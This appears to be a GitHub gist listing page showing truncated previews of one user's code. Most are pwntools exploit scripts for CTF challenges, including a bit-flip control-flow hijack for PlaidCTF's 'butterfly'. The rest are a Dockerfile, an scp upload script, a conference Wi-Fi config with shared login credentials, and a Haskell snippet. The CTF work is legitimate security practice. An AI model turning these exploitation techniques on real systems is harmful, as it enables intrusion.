
Jonas Rudloff kokjo

from pwn import *
def pwnit():
#h, w = (1024, 1024)
w, h = (1024, 1024)
#r.sendline(" "+"0"*4096 + "1 , 0 , A")
#r.recvuntil("> ")
kokjo / doit.py
Created April 10, 2017 12:21
Exploit for the challenge random from ASIS Quals CTF 2017
from pwn import *
context.arch = "amd64"
r = process("./Random_Generator_8c110de2ce4abb0f909bca289fb7b1a99fd18ef1")
#r = remote("69.90.132.40", 4000)
values = [0]
for i in range(1,8):
r.sendline(str(i))
kokjo / doit.py
Last active June 3, 2019 15:52
Solution to CRC problem from asis ctf 2017
from pwn import *
# Show a progress indicator while the lookup table below is built.
s = log.waitfor("Calculating CRC reverse lookup table")
# Map the CRC-32 of every 2-byte string (p16(i) for i in 0..65535) back to
# those 2 bytes, so a checksum value can be resolved to its 16-bit input.
reverse_crc = {crc.crc_32(p16(i)): p16(i) for i in range(2**16)}
s.success()
# Parse the challenge binary's ELF metadata and start the same file as a
# local process. How e and r are used is not visible in this preview.
e = ELF("./crcme_8416479dcf3a74133080df4f454cd0f76ec9cc8d")
r = process("./crcme_8416479dcf3a74133080df4f454cd0f76ec9cc8d")
@MemLeak
# Fedora image carrying 32-bit (i686) and 64-bit C/C++ build dependencies,
# strace, and a checkout of zxcvbn-c.
# NOTE(review): the base image has no tag or digest, so each build pulls
# whatever is current; pin a release or digest for a reproducible image.
FROM fedora
# 32-bit runtime libraries: glibc, OpenSSL and protobuf.
RUN dnf -y install glibc.i686 openssl-libs.i686 protobuf-devel.i686 protobuf-lite.i686 protobuf.i686
# Source control and the SCons build tool.
RUN dnf -y install git scons
RUN dnf -y install gcc
# 32-bit development headers and compiler support libraries.
RUN dnf -y install glibc-devel.i686 libgcc.i686 libstdc++-devel.i686
RUN dnf -y install strace
RUN dnf -y install gcc-c++
# 64-bit counterparts of the development packages above.
RUN dnf -y install glibc-devel.x86_64 libgcc.x86_64 libstdc++-devel.x86_64
# NOTE(review): this clones the head of the default branch with no commit pin
# or checksum, so the image follows whatever upstream publishes; check out a
# reviewed commit after cloning.
RUN git clone https://github.com/tsyrogit/zxcvbn-c.git
kokjo / doit_letsenchiffre.py
Last active April 6, 2017 05:54
Exploit for letsenchiffre from Nuit du Hack quals 2017
import letsenchiffre_pb2 as letsenchiffre
from pwn import *
def forge_request(password):
crtreq = letsenchiffre.CertificateRequest()
crtreq.Locality = "A"
crtreq.State = "A"
crtreq.City = "A"
crtreq.Company = "A"
crtreq.CommonName = "A"
kokjo / up
Created March 29, 2017 22:07
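#!/bin/sh
# up: copy one local file into the web root of a remote host with scp, then
# print the URL it should be reachable at and its SHA-256 digest.
# Usage: up FILE
#
# NOTE(review): older scp implementations hand the remote path to the remote
# login shell, so a file name containing spaces or shell metacharacters may be
# re-interpreted on the server; keep uploaded names plain.
# NOTE(review): the URL is plain http, so the digest printed below only helps
# a recipient who receives it over a separate, trusted channel.
set -e    # stop before printing a URL if the upload fails

WEBROOT="/path/to/web/root/on/server"
HOST="put.hostname.here"

if [ "$#" -ne 1 ] || [ ! -f "$1" ]; then
    echo "usage: $0 FILE" >&2
    exit 2
fi

name=$(basename -- "$1")

# Prefix relative paths with ./ so scp cannot mistake a name that starts with
# "-" for an option, or one that contains ":" for a remote host:path.
case "$1" in
    /*) src=$1 ;;
    *)  src=./$1 ;;
esac

# ${WEBROOT%/}/ yields exactly one slash between the directory and the file
# name, whether or not WEBROOT was configured with a trailing slash.
scp "$src" "${USER}@${HOST}:${WEBROOT%/}/${name}"
echo "http://${HOST}/${name}"
sha256sum -- "$1"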
kokjo / .net.conf
Created December 27, 2016 11:17
net tool configuration for 33c3
ccc:
ssid: 33C3
dns: dhcp
wpa: |
network={
ssid="33C3"
key_mgmt=WPA-EAP
eap=TTLS
identity="edward"
password="snowden"
kokjo / Bug.hs
Created December 21, 2016 15:11
module Bug where
import Control.Monad
import Control.Monad.State (gets)
import Control.Monad.Trans.Class (lift)
foo = lift lift gets
{-
$ ghc bug.hs
kokjo / demo.c
Created October 10, 2016 12:43
The old demo tool from pwntools.
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv) {
kokjo / doit_butterfly.py
Last active April 20, 2016 10:09
My solution to the butterfly challenge from Plaidctf 2016
from pwn import *
# Set the pwntools target architecture to 64-bit x86.
context(arch="amd64")
# Parse the challenge binary locally; used below to look up the address of main.
e = ELF("./butterfly_33e86bcc2f0a21d57970dc6907867bed")
r = remote("butterfly.pwning.xxx", 9999)
# Local-process alternative to the remote connection, left disabled.
#r = process("./butterfly_33e86bcc2f0a21d57970dc6907867bed")
addr = 0x400860+3
# Puts the byte address in the high bits and the constant 6 in the low three.
# NOTE(review): presumably the service reads this as address * 8 + bit index;
# confirm against the binary.
num = (addr << 3) + 6
# Send the number in decimal, space-padded to 40 characters, followed by the
# packed 8-byte address of main.
# NOTE(review): str + p64(...) only concatenates where p64 returns str
# (Python 2); on Python 3 p64 returns bytes and this line raises TypeError.
r.sendline(str(num).ljust(40)+p64(e.symbols["main"]))